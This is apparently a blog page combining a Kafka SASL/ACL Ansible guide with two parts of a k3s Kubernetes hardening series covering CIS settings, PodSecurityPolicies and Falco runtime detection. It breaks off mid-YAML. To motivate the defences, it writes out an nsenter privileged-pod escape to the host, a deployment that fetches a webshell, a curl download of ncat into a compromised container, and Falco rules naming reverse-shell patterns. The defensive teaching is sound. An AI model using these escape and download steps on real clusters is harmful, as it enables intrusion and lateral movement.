It is all too easy to create a Kafka cluster and let it be used as a streaming platform, but how do you secure it for sensitive data? This blog will introduce you to some of the security features in Apache Kafka and provide a fully working project on Github for you to install, configure and secure a Kafka cluster.
If you would like to know more about how to implement modern data and cloud technologies into your business, we at Digitalis do it all: from cloud and Kubernetes migration to fully managed services, we can help you modernize your operations, data, and applications – on-premises, in the cloud and hybrid.
We provide consulting and managed services on a wide variety of technologies including Apache Kafka.
Contact us today for more information or to learn more about each of our services.
One of the many areas of Kafka that often gets overlooked is the management of topics, the Access Control Lists (ACLs) and Simple Authentication and Security Layer (SASL) components, and how to lock down and secure a cluster. There is no denying that securing Kafka is complex, but hopefully this blog and the associated Ansible project on Github will help you do it.
At Digitalis we focus on using tools that can automate and maintain our processes. Managing ACLs within Kafka is a command-line process, but maintaining active users can become difficult as the cluster size increases and more users are added.
As such we have built an ACL and SASL manager which we have released as open source on the Digitalis Github repository. The URL is: https://github.com/digitalis-io/kafka_sasl_acl_manager
The Kafka, SASL and ACL Manager is a set of playbooks written in Ansible to manage the installation of Kafka and ZooKeeper along with the topics, SASL users and ACLs for the cluster.
Kafka is an open source project that provides a framework for storing, reading and analysing streaming data. Kafka was originally created at LinkedIn, where it played a part in analysing the connections between their millions of professional users in order to build networks between people. It was given open source status and passed to the Apache Foundation – which coordinates and oversees development of open source software – in 2011.
Being open source means that it is essentially free to use and has a large network of users and developers who contribute towards updates, new features and offering support for new users.
Kafka is designed to be run in a “distributed” environment, which means that rather than sitting on one user’s computer, it runs across several (or many) servers, leveraging the additional processing power and storage capacity that this brings.
Kafka ships with a pluggable Authorizer and an out-of-the-box authorizer implementation that uses ZooKeeper to store all the ACLs. Kafka ACLs are defined in the general format of “Principal P is [Allowed/Denied] Operation O From Host H On Resource R”.
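For example, granting a principal read access to a topic from the command line looks something like this (topic, group and ZooKeeper address here are placeholders for your own values):

bin/kafka-acls.sh --authorizer-properties zookeeper.connect=localhost:2181 \
  --add --allow-principal User:alice --operation Read \
  --topic metricbeat --group metricbeatCon1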
Ansible is a configuration management and orchestration tool. It works as an IT automation engine.
Ansible can be run directly from the command line without setting up any configuration files. You only need to install Ansible on the control server or node. It communicates and performs the required tasks using SSH. No other installation is required. This is different from other orchestration tools like Chef and Puppet where you have to install software both on the control and client nodes.
Ansible uses configuration files called playbooks to perform a series of tasks.
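As a minimal illustration (not part of the project itself), a playbook is just a YAML file describing tasks to run against a group of hosts:

- hosts: kafka_brokers
  become: true
  tasks:
    - name: Ensure the Kafka configuration directory exists
      file:
        path: /opt/kafka/config
        state: directory
        mode: 0755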
The Java Authentication and Authorization Service (JAAS) was introduced as an optional package (extension) to the Java SDK.
JAAS can be used for two purposes: for authentication of users, to reliably and securely determine who is currently executing Java code; and for authorization of users, to ensure they have the rights required to perform the actions attempted.
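In Kafka's case, the brokers read their SASL credentials from a JAAS file. As a hedged illustration (usernames and passwords are placeholders), a broker-side jaas.conf for the PLAIN mechanism typically looks like:

KafkaServer {
  org.apache.kafka.common.security.plain.PlainLoginModule required
  username="admin"
  password="admin-secret"
  user_admin="admin-secret"
  user_alice="alice-secret";
};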
Setup the inventories/hosts.yml to match your specific inventory
Setup the group_vars
For PLAINTEXT Authorisation set the following variables in group_vars/all.yml
kafka_listener_protocol: PLAINTEXT
kafka_inter_broker_listener_protocol: PLAINTEXT
kafka_allow_everyone_if_no_acl_found: 'true' # !IMPORTANT
For SASL_PLAINTEXT Authorisation set the following variables in group_vars/all.yml
configure_sasl: true
configure_acl: true
kafka_opts: |
  -Djava.security.auth.login.config=/opt/kafka/config/jaas.conf
kafka_listener_protocol: SASL_PLAINTEXT
kafka_inter_broker_listener_protocol: SASL_PLAINTEXT
kafka_sasl_mechanism_inter_broker_protocol: PLAIN
kafka_sasl_enabled_mechanisms: PLAIN
kafka_super_users: "User:admin" # SASL admin user that has access to administer Kafka.
kafka_allow_everyone_if_no_acl_found: 'false'
kafka_authorizer_class_name: "kafka.security.authorizer.AclAuthorizer"
Once the above has been set as configuration for Kafka and ZooKeeper, you will need to configure the topics and SASL users. The SASL user list needs to be set in group_vars/kafka_brokers.yml. These need to be set on all the brokers, and the play will configure the jaas.conf on every broker in a rolling fashion. The list is a simple YAML-format username and password list. Please don't remove the admin_user_password entry, as it needs to be set so that the brokers can communicate with each other. The default admin username is admin.
In the group_vars/all.yml there is a list called topics_acl_users. This is a two-fold list that manages the topics to be created as well as the ACLs that need to be set per topic. Each topic has two access roles (a user that can produce to the topic and a user that can consume from it) and the list splits that functionality accordingly, as in the sketch below.
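As an illustrative sketch only (the field names here are assumptions, check the repository for the real schema), an entry could look like:

topics_acl_users:
  - topic: metricbeat
    producers:
      - metricbeat_writer
    consumers:
      - metricbeat_reader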
Example play:
ansible-playbook playbooks/base.yml -i inventories/hosts.yml -u root
Once the above has been set up, the environment is prepped with the basics, allowing the Kafka and ZooKeeper install plays to connect as the root user and install and configure the services.
The Kafka and ZooKeeper installs can individually be toggled on or off with variables in the group_vars/all.yml. The variables have been set to use open source Apache Kafka.
install_zookeeper_opensource: true
install_kafka_opensource: true
ansible-playbook playbooks/install_kafka_zkp.yml -i inventories/hosts.yml -u root
Once Kafka has been installed, the last playbook needs to be run.
Based on either the SASL_PLAINTEXT or PLAINTEXT configuration, the playbook will configure the topics and ACLs accordingly. Please note that for ACLs to work in Kafka there needs to be an authentication engine behind them.
If you want to install Kafka to allow any connections and auto-create topics, please set the following configuration in the group_vars/all.yml
configure_topics: false
kafka_auto_create_topics_enable: true
This will disable the topic creation step and allow any topics to be created with the Kafka defaults.
Once all the above topic and ACL config has been finalised please run:
ansible-playbook playbooks/configure_kafka.yml -i inventories/hosts.yml -u root
Steps
PLAINTEXT
/opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server $(hostname):9092 --topic metricbeat --group metricebeatCon1
SASL_PLAINTEXT
/opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server $(hostname):9092 --consumer.config /opt/kafka/config/kafkaclient.jaas.conf --topic metricbeat --group metricebeatCon1
As part of the ACL play, a default kafkaclient.jaas.conf file is created, as used in the examples above. This has the basic setup needed to connect to Kafka from any client using SASL_PLAINTEXT authentication.
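For reference, a minimal SASL_PLAINTEXT client properties file of that kind (credentials here are placeholders, not the project's actual file) contains:

security.protocol=SASL_PLAINTEXT
sasl.mechanism=PLAIN
sasl.jaas.config=org.apache.kafka.common.security.plain.PlainLoginModule required \
  username="alice" \
  password="alice-secret";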
This project will give you an easily repeatable and more sustainable security model for Kafka.
The Ansible playbooks are idempotent and can be run in succession as many times a day as you need. You can add and remove security and keep a running, highly available cluster that is secure.
For any further assistance please reach out to us at Digitalis and we will be happy to assist.
This is the final part in a three part blog series on deploying k3s, a certified Kubernetes distribution from SUSE Rancher, in a secure and available fashion. In part 1 we secured the network and host operating system and deployed k3s. In the second part of the blog we hardened the cluster further, up to the application level. Now, in the final part of the blog, we will leverage some great tools to create a security-responsive cluster. Note, a fully working Ansible project, https://github.com/digitalis-io/k3s-on-prem-production, has been made available to deploy and secure k3s for you.
If you would like to know more about how to implement modern data and cloud technologies, such as Kubernetes, into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on Kubernetes, cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.
In the previous blog we saw the huge benefits of tidying up our cluster and securing it following the best recommendations from the CIS Benchmark for Kubernetes. We also saw how we cannot cover everything, for example a bad actor stealing the administrator account token for the APIs.
Let's recap the POD escaping technique used in the previous part, using the administrator account:
~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '
{
"spec": {
"hostPID": true,
"hostNetwork": true,
"containers": [
{
"name": "busybox",
"image": "alpine:3.7",
"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
"stdin": true,
"tty": true,
"resources": {"requests": {"cpu": "10m"}},
"securityContext": {
"privileged": true
}
}
]
}
}' --rm --attach
If you don't see a command prompt, try pressing enter.
[root@worker01 /]#
Not good. We could create a specific PSP disallowing exec, but that would hinder the legitimate internal use of the privileged account.
Is there anything else we can do?
Falco is a cloud-native runtime security project, and is the de facto Kubernetes threat detection engine. Falco was created by Sysdig in 2016 and is the first runtime security project to join CNCF as an incubation-level project. Falco detects unexpected application behavior and alerts on threats at runtime.
And not only that, Falco will also monitor our system by parsing the Linux system calls from the kernel (either using a kernel module or eBPF) and uses its powerful rule engine to create alerts.
Installing it is pretty straightforward
- name: Install Falco repo /rpm-key
  rpm_key:
    state: present
    key: https://falco.org/repo/falcosecurity-3672BA8F.asc

- name: Install Falco repo /rpm-repo
  get_url:
    url: https://falco.org/repo/falcosecurity-rpm.repo
    dest: /etc/yum.repos.d/falcosecurity.repo

- name: Install falco on control plane
  package:
    state: present
    name: falco

- name: Check if driver is loaded
  shell: |
    set -o pipefail
    lsmod | grep falco
  changed_when: no
  failed_when: no
  register: falco_module
We will install Falco directly on our hosts to have it separated from the kubernetes cluster, having a little more separation between the security layer and the application layer. It can also be installed quite easily as a DaemonSet using their official Helm Chart in case you do not have access to the underlying nodes.
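If you go the DaemonSet route instead, the Helm install is roughly the following (chart values omitted, release name assumed):

helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco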
Then we will configure Falco to talk with our APIs by modifying the service file
[Unit]
Description=Falco: Container Native Runtime Security
Documentation=https://falco.org/docs/
[Service]
Type=simple
User=root
ExecStartPre=/sbin/modprobe falco
ExecStart=/usr/bin/falco --pidfile=/var/run/falco.pid --k8s-api-cert=/etc/falco/token \
--k8s-api https://{{ keepalived_ip }}:6443 -pk
ExecStopPost=/sbin/rmmod falco
UMask=0077
# Rest of the file omitted for brevity
[...]
We will create an admin ServiceAccount and provide the token to Falco to authenticate it for the API calls.
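A hedged sketch of those steps with kubectl (the account name is assumed, and on Kubernetes versions of this era the token lives in an auto-created Secret):

kubectl create serviceaccount falco -n kube-system
kubectl create clusterrolebinding falco-admin \
  --clusterrole=cluster-admin --serviceaccount=kube-system:falco
kubectl -n kube-system get secret \
  $(kubectl -n kube-system get sa falco -o jsonpath='{.secrets[0].name}') \
  -o jsonpath='{.data.token}' | base64 -d > /etc/falco/token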
We will install Falco Sidekick in the cluster; it is a simple daemon for enhancing the available outputs for Falco. It takes a Falco event and forwards it to different outputs. For the sake of simplicity, we will just configure Sidekick to notify us on Slack when something is wrong.
It works as a single endpoint for as many falco instances as you want:
In the inventory just set the following variable
falco_sidekick_slack: "https://hooks.slack.com/services/XXXXX-XXXX-XXXX"
# This is a secret and should be Vaulted!
Now let’s see what happens when we deploy the previous escaping POD
What can we do with it? We will deploy a python function that will be called by FalcoSidekick when something is happening.
Let’s deploy kubeless on our cluster following the task on roles/k3s-deploy/tasks/kubeless.yml or simply with the command
$ kubectl apply -f https://github.com/kubeless/kubeless/releases/download/v1.0.8/kubeless-v1.0.8.yaml
And let's not forget to create the corresponding RoleBindings and PSPs for it, as it will need some superpowers to run on our cluster.
After Kubeless deployment is completed we can proceed to deploy our function.
Let’s start simple and just react to a pod Attach or Exec
# code skipped for brevity
[...]
def pod_delete(event, context):
    rule = event['data']['rule'] or None
    output_fields = event['data']['output_fields'] or None
    if rule and output_fields:
        if (rule == "Attach/Exec Pod" or rule == "Create HostNetwork Pod"):
            if output_fields['ka.target.name'] and output_fields[
                    'ka.target.namespace']:
                pod = output_fields['ka.target.name']
                namespace = output_fields['ka.target.namespace']
                print(
                    f"Rule: \"{rule}\" fired: Deleting pod \"{pod}\" in namespace \"{namespace}\""
                )
                client.CoreV1Api().delete_namespaced_pod(
                    name=pod,
                    namespace=namespace,
                    body=client.V1DeleteOptions(),
                    grace_period_seconds=0
                )
                send_slack(
                    rule, pod, namespace, event['data']['output'],
                    time.time_ns()
                )
Then deploy it to kubeless.
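In the project this is done via a template, but with the kubeless CLI the equivalent would be something like the following (file, function and handler names are assumptions):

kubeless function deploy falco-pod-delete \
  --runtime python3.7 \
  --from-file falco_function.py \
  --handler falco_function.pod_delete \
  --dependencies requirements.txt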
Let's try our escaping POD from the administrator account again
~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '
{
"spec": {
"hostPID": true,
"hostNetwork": true,
"containers": [
{
"name": "busybox",
"image": "alpine:3.7",
"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
"stdin": true,
"tty": true,
"resources": {"requests": {"cpu": "10m"}},
"securityContext": {
"privileged": true
}
}
]
}
}' --rm --attach
If you don't see a command prompt, try pressing enter.
[root@worker01 /]#
We will receive this on Slack
And the POD is killed, and the process immediately exited. So we limited the damage by automatically responding in a fast manner to a fishy situation.
Falco will also keep an eye on the base host, alerting if protected files are opened or strange processes are spawned, like network scanners.
Exposing our shiny new service running on our new cluster is not all sunshine and roses. We could have done all in our power to secure the cluster, but what if the services deployed in the cluster are vulnerable?
Here in this example we will deploy a PHP website that simulates the presence of a Remote Command Execution (RCE) vulnerability. Those are quite common and not to be underestimated.
Let’s deploy this simple service with our non-privileged user
apiVersion: apps/v1
kind: Deployment
metadata:
  name: php
  labels:
    tier: backend
spec:
  replicas: 1
  selector:
    matchLabels:
      app: php
      tier: backend
  template:
    metadata:
      labels:
        app: php
        tier: backend
    spec:
      automountServiceAccountToken: true
      securityContext:
        runAsNonRoot: true
        runAsUser: 1000
      volumes:
        - name: code
          persistentVolumeClaim:
            claimName: code
      containers:
        - name: php
          image: php:7-fpm
          volumeMounts:
            - name: code
              mountPath: /code
      initContainers:
        - name: install
          image: busybox
          volumeMounts:
            - name: code
              mountPath: /code
          command:
            - wget
            - "-O"
            - "/code/index.php"
            - "https://raw.githubusercontent.com/alegrey91/systemd-service-hardening/master/ansible/files/webshell.php"
The file demo/php.yaml will also contain the nginx container to run the app and an external ingress definition for it.
~ $ kubectl-user get pods,svc,ingress
NAME READY STATUS RESTARTS AGE
pod/nginx-64d59b466c-lm8ll 1/1 Running 0 3m9s
pod/php-66f85644d-2ffbt 1/1 Running 0 3m10s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/nginx-php ClusterIP 10.44.38.54 <none> 8080/TCP 3m9s
service/php ClusterIP 10.44.98.87 <none> 9000/TCP 3m10s
NAME HOSTS ADDRESS PORTS AGE
ingress.networking.k8s.io/security-pod-ingress testweb.192.168.1.200.nip.io 192.168.1.200 80
Now let’s adapt our function to respond to a more varied selection of rules firing from Falco.
# code skipped for brevity
[...]
def pod_delete(event, context):
    rule = event['data']['rule'] or None
    output_fields = event['data']['output_fields'] or None
    if rule and output_fields:
        if (
            rule == "Debugfs Launched in Privileged Container" or
            rule == "Launch Package Management Process in Container" or
            rule == "Launch Remote File Copy Tools in Container" or
            rule == "Launch Suspicious Network Tool in Container" or
            rule == "Mkdir binary dirs" or rule == "Modify binary dirs" or
            rule == "Mount Launched in Privileged Container" or
            rule == "Netcat Remote Code Execution in Container" or
            rule == "Read sensitive file trusted after startup" or
            rule == "Read sensitive file untrusted" or
            rule == "Run shell untrusted" or
            rule == "Sudo Potential Privilege Escalation" or
            rule == "Terminal shell in container" or
            rule == "The docker client is executed in a container" or
            rule == "User mgmt binaries" or
            rule == "Write below binary dir" or
            rule == "Write below etc" or
            rule == "Write below monitored dir" or
            rule == "Write below root" or
            rule == "Create files below dev" or
            rule == "Redirect stdout/stdin to network connection" or
            rule == "Reverse shell" or
            rule == "Code Execution from TMP folder in Container" or
            rule == "Suspect Renamed Netcat Remote Code Execution in Container"
        ):
            if output_fields['k8s.ns.name'] and output_fields['k8s.pod.name']:
                pod = output_fields['k8s.pod.name']
                namespace = output_fields['k8s.ns.name']
                print(
                    f"Rule: \"{rule}\" fired: Deleting pod \"{pod}\" in namespace \"{namespace}\""
                )
                client.CoreV1Api().delete_namespaced_pod(
                    name=pod,
                    namespace=namespace,
                    body=client.V1DeleteOptions(),
                    grace_period_seconds=0
                )
                send_slack(
                    rule, pod, namespace, event['data']['output'],
                    output_fields['evt.time']
                )
# code skipped for brevity
[...]
The complete function file is here: roles/k3s-deploy/templates/kubeless/falco_function.yaml.j2
What can we do from here? Well first we could try and call the kubernetes APIs, but thanks to our previous hardening steps, anonymous querying is denied and ServiceAccount tokens automount is disabled.
But we can still try and poke around the network! The first thing is to use nmap to scan our network around and see if we can do any lateral movement. Let’s install it!
We cannot use the package manager? Well, we can still download a statically linked precompiled binary to use inside the container! Let's head to this repo: https://github.com/andrew-d/static-binaries/ where we will find a healthy collection of tools that we can use to do naughty things!
Let's use them; with this command in the webshell we will download netcat
curl https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/ncat \
--output nc
Let's try using the downloaded binary. We will rename it to unnamedbin; just launching it to print its help shows that it really works
Custom rules in Falco are quite straightforward: they are written in YAML and not a DSL, and the documentation at https://falco.org/docs/ is exhaustive and clearly written
- rule: Suspect Renamed Netcat Remote Code Execution in Container
  desc: Netcat Program runs inside container that allows remote code execution
  condition: >
    spawned_process and container and
    ((proc.args contains "ash" or
      proc.args contains "bash" or
      proc.args contains "csh" or
      proc.args contains "ksh" or
      proc.args contains "/bin/sh" or
      proc.args contains "tcsh" or
      proc.args contains "zsh" or
      proc.args contains "dash") and
     (proc.args contains "-e" or
      proc.args contains "-c" or
      proc.args contains "--sh-exec" or
      proc.args contains "--exec" or
      proc.args contains "-c " or
      proc.args contains "--lua-exec"))
  output: >
    Suspect Reverse shell using renamed netcat runs inside container that allows remote code execution (user=%user.name user_loginuid=%user.loginuid
    command=%proc.cmdline container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
  priority: WARNING
  tags: [network, process, mitre_execution]
There's no perfect security; the rule is simple: “If it's connected, it's vulnerable.”
So it's our job to always keep an eye on our clusters, enable monitoring and alerting, and groom our set of rules over time; that will make the cluster smarter in dangerous situations, or simply alert us to new things.
This series is not covering other important parts of your application lifecycle, like Docker Image Scanning, Sonarqube integration in your CI/CD pipeline to try and not have vulnerable applications in the cluster in the first place, and operation activities during your cluster lifecycle like defining Network Policies for your deployments and correctly creating Cluster Roles with the “principle of least privilege” always in mind.
This series of posts should give you an idea of the best practices (always evolving) and the risks and responsibilities you have when deploying kubernetes on-premises in your own server room. If you would like help, please reach out!
The full Ansible playbook is available in the repo at https://github.com/digitalis-io/k3s-on-prem-production
This is part 2 in a three part blog series on deploying k3s, a certified Kubernetes distribution from SUSE Rancher, in a secure and available fashion. In the previous blog we secured the network and host operating system and deployed k3s. Note, a fully working Ansible project, https://github.com/digitalis-io/k3s-on-prem-production, has been made available to deploy and secure k3s for you.
If you would like to know more about how to implement modern data and cloud technologies, such as Kubernetes, into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on Kubernetes, cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.
So we have a running K3s cluster, are we done yet (see part 1)? Not at all!
We have secured the underlying machines and we have secured the network using strong segregation, but how about the cluster itself? There is still a lot to think about and handle, so let's take a look at some dangerous patterns.
Let’s suppose we want to give someone the edit cluster role permission so that they can deploy pods, but obviously not an administrator account. We expect the account to be just able to stay in its own namespace and not harm the rest of the cluster, right?
Let’s create the user:
~ $ kubectl create namespace unprivileged-user
~ $ kubectl create serviceaccount -n unprivileged-user fake-user
~ $ kubectl create rolebinding -n unprivileged-user fake-editor --clusterrole=edit \
--serviceaccount=unprivileged-user:fake-user
Obviously the user cannot do much outside of its own namespace
~ $ kubectl-user get pods -A
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:unprivileged-user:fake-user" cannot list resource "pods" in API group "" at the cluster scope
But what if we want to deploy a privileged POD? Are we allowed to? Let's deploy this
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: privileged-deploy
  name: privileged-deploy
spec:
  replicas: 1
  selector:
    matchLabels:
      app: privileged-deploy
  template:
    metadata:
      labels:
        app: privileged-deploy
    spec:
      containers:
        - image: alpine
          name: alpine
          stdin: true
          tty: true
          securityContext:
            privileged: true
      hostPID: true
      hostNetwork: true
This will work flawlessly, and the POD has hostPID, hostNetwork and runs as root.
~ $ kubectl-user get pods -n unprivileged-user
NAME READY STATUS RESTARTS AGE
privileged-deploy-8878b565b-8466r 1/1 Running 0 24m
What can we do now? We can do some nasty things!
Let’s analyse the situation. If we enter the POD, we can see that we have access to all the Host’s processes (thanks to hostPID) and the main network (thanks to hostNetwork).
~ $ kubectl-user exec -ti -n unprivileged-user privileged-deploy-8878b565b-8466r -- sh
/ # ps aux | head -n 5
PID USER TIME COMMAND
1 root 0:05 /usr/lib/systemd/systemd --switched-root --system --deserialize 16
574 root 0:01 /usr/lib/systemd/systemd-journald
605 root 0:00 /usr/lib/systemd/systemd-udevd
631 root 0:02 /sbin/auditd
/ # ip addr | head -n 10
1: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq state UP qlen 1000
link/ether 56:2f:49:03:90:d0 brd ff:ff:ff:ff:ff:ff
inet 192.168.122.21/24 brd 192.168.122.255 scope global eth0
valid_lft forever preferred_lft forever
Having root access, we can use the command nsenter to run programs in different namespaces. Which namespace you ask? Well we can use the namespace of PID 1!
/ # nsenter --mount=/proc/1/ns/mnt --net=/proc/1/ns/net --ipc=/proc/1/ns/ipc \
--uts=/proc/1/ns/uts --cgroup=/proc/1/ns/cgroup -- sh -c /bin/bash
[root@worker01 /]#
So now we are root on the host node. We escaped the pod and are now able to do whatever we want on the node.
This obviously is a huge hole in the cluster security, and we cannot put the cluster in the hands of anyone and just rely on their good will! Let’s try to set up the cluster better using the CIS Security Benchmark for Kubernetes.
A notable mention goes to K3s here: it already has a number of security mitigations applied and turned on by default, and will pass a number of the Kubernetes CIS controls without modification. Which is a huge plus for us!
We will follow the cluster hardening task in the accompanying Github project roles/k3s-deploy/tasks/cluster_hardening.yml
File permissions are already well set with K3s, but a simple task to ensure files and folders are respectively 0600 and 0700 ensures following the CIS Benchmark rules from 1.1.1 to 1.1.21 (File Permissions)
# CIS 1.1.1 to 1.1.21
- name: Cluster Hardening - Ensure folder permission are strict
  command: |
    find {{ item }} -not -path "*containerd*" -exec chmod -c go= {} \;
  register: chmod_result
  changed_when: "chmod_result.stdout != \"\""
  with_items:
    - /etc/rancher
    - /var/lib/rancher
Digging deeper we will first harden our Systemd Service using the isolation capabilities it provides:
File: /etc/systemd/system/k3s-server.service and /etc/systemd/system/k3s-agent.service
### Full configuration not displayed for brevity
[...]
###
# Sandboxing features
{%if 'libselinux' in ansible_facts.packages %}
AssertSecurity=selinux
ConditionSecurity=selinux
{% endif %}
LockPersonality=yes
PrivateTmp=yes
ProtectHome=yes
ProtectHostname=yes
ProtectKernelLogs=yes
ProtectKernelTunables=yes
ProtectSystem=full
ReadWriteDirectories=/var/lib/ /var/run /run /var/log/ /lib/modules /etc/rancher/
This will prevent the spawned process from having write access outside of the designated directories, protects the rest of the system from unwanted reads, protects the Kernel Tunables and Logs and sets up a private Home and TMP directory for the process.
This ensures a minimum layer of isolation between the process and the host. A number of modifications on the host system will be needed to ensure correct operation, in particular setting up sysctl flags that would have been modified by the process instead.
vm.panic_on_oom=0
vm.overcommit_memory=1
kernel.panic=10
kernel.panic_on_oops=1
File: /etc/sysctl.conf
After this we can be sure that the K3s process will not modify the underlying system. Which is a huge win by itself.
We are now on the application level, and here K3s comes to meet us being already set up with sane defaults for file permissions and service setups.
SSL, in an appropriate environment, should comply with the Federal Information Processing Standard (FIPS) Publication 140-2
--kube-apiserver-arg=tls-min-version=VersionTLS12 \
--kube-apiserver-arg=tls-cipher-suites=TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,TLS_RSA_WITH_AES_128_GCM_SHA256,TLS_RSA_WITH_AES_256_GCM_SHA384 \
File: /etc/systemd/system/k3s-server.service
--kubelet-arg=tls-cipher-suites=TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,TLS_RSA_WITH_AES_128_GCM_SHA256,TLS_RSA_WITH_AES_256_GCM_SHA384 \
File: /etc/systemd/system/k3s-server.service and /etc/systemd/system/k3s-agent.service
Where etcd encryption is used, it is important to ensure that the appropriate set of encryption providers is used.
--kube-apiserver-arg='encryption-provider-config=/etc/k3s-encryption.yaml' \
File: /etc/systemd/system/k3s-server.service
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
  - resources:
      - secrets
    providers:
      - aescbc:
          keys:
            - name: key1
              secret: {{ k3s_encryption_secret }}
      - identity: {}
File: /etc/k3s-encryption.yaml
To generate an encryption secret just run
~ $ head -c 32 /dev/urandom | base64
The runtime requirements to comply with the CIS Benchmark are centered around pod security (PSPs) and network policies. By default, K3s runs with the “NodeRestriction” admission controller. With the following we will enable all the Admission Plugins requested by the CIS Benchmark compliance:
--kube-apiserver-arg='enable-admission-plugins=AlwaysPullImages,DefaultStorageClass,DefaultTolerationSeconds,LimitRanger,MutatingAdmissionWebhook,NamespaceLifecycle,NodeRestriction,PersistentVolumeClaimResize,PodSecurityPolicy,Priority,ResourceQuota,ServiceAccount,TaintNodesByCondition,ValidatingAdmissionWebhook' \
File: /etc/systemd/system/k3s-server.service
Auditing the Kubernetes API Server provides a security-relevant chronological set of records documenting the sequence of activities that have affected the system, whether by individual users, administrators or other components of the system
--kube-apiserver-arg=audit-log-maxage=30 \
--kube-apiserver-arg=audit-log-maxbackup=30 \
--kube-apiserver-arg=audit-log-maxsize=30 \
--kube-apiserver-arg=audit-log-path=/var/lib/rancher/audit/audit.log \
File: /etc/systemd/system/k3s-server.service
If --service-account-lookup is not enabled, the apiserver only verifies that the authentication token is valid, and does not validate that the service account token mentioned in the request is actually present in etcd. This allows using a service account token even after the corresponding service account is deleted. This is an example of a time-of-check to time-of-use security issue.
Also APIs should never allow anonymous querying on either the apiserver or kubelet side.
--kube-apiserver-arg='service-account-lookup=true' \
--kube-apiserver-arg=anonymous-auth=false \
--kubelet-arg='anonymous-auth=false' \
--kube-controller-manager-arg='use-service-account-credentials=true' \
--kube-apiserver-arg='request-timeout=300s' \
--kubelet-arg='streaming-connection-idle-timeout=5m' \
--kube-controller-manager-arg='terminated-pod-gc-threshold=10' \
File: /etc/systemd/system/k3s-server.service
By default K3s does not distinguish between control-plane and worker nodes like full kubernetes does, and will schedule PODs even on master nodes.
This is not recommended in a production multi-node and multi-master environment, so we will prevent it by adding the following flag
--node-taint CriticalAddonsOnly=true:NoExecute \
File: /etc/systemd/system/k3s-server.service
We now have a quite well set up cluster both node-wise and service-wise, but are we done yet?
Not really, we have auditing and we have enabled a bunch of admission controllers, but the previous deployment still works because we are still missing an important piece of the puzzle.
First we will create a system-unrestricted PSP, this will be used by the administrator account and the kube-system namespace, for the legitimate privileged workloads that can be useful for the cluster.
Let’s define it in roles/k3s-deploy/files/policy/system-psp.yaml
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: system-unrestricted-psp
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
    - '*'
  volumes:
    - '*'
  hostNetwork: true
  hostPorts:
    - min: 0
      max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
So we are allowing PODs with this PSP to run as root and to use hostIPC, hostPID and hostNetwork.
This will be valid only for cluster nodes and for the kube-system namespace; we will define the corresponding ClusterRole and ClusterRoleBinding for these entities in the playbook.
For the rest of the users and namespaces we want to limit the PODs capabilities as much as possible. We will provide the following PSP in roles/k3s-deploy/files/policy/restricted-psp.yaml
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: global-restricted-psp
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: 'docker/default,runtime/default'  # CIS - 5.7.2
    seccomp.security.alpha.kubernetes.io/defaultProfileName: 'runtime/default'  # CIS - 5.7.2
spec:
  privileged: false                # CIS - 5.2.1
  allowPrivilegeEscalation: false  # CIS - 5.2.5
  requiredDropCapabilities:        # CIS - 5.2.7/8/9
    - ALL
  volumes:
    - 'configMap'
    - 'emptyDir'
    - 'projected'
    - 'secret'
    - 'downwardAPI'
    - 'persistentVolumeClaim'
  forbiddenSysctls:
    - '*'
  hostPID: false      # CIS - 5.2.2
  hostIPC: false      # CIS - 5.2.3
  hostNetwork: false  # CIS - 5.2.4
  runAsUser:
    rule: 'MustRunAsNonRoot'  # CIS - 5.2.6
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'MustRunAs'
    ranges:
      - min: 1
        max: 65535
  fsGroup:
    rule: 'MustRunAs'
    ranges:
      - min: 1
        max: 65535
  readOnlyRootFilesystem: false
We are now disallowing privileged containers, hostPID, hostIPC and hostNetwork, we are forcing the container to run with a non-root user and applying the default seccomp profile for docker containers, whitelisting only a restricted and well-known set of syscalls in them.
We will create the corresponding ClusterRole and ClusterRoleBindings in the playbook, enforcing this PSP to any system:serviceaccounts, system:authenticated and system:unauthenticated.
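Those bindings live in the playbook; a minimal sketch of what they boil down to (names assumed) looks like this:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: global-restricted-psp
rules:
  - apiGroups: ['policy']
    resources: ['podsecuritypolicies']
    verbs: ['use']
    resourceNames: ['global-restricted-psp']
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
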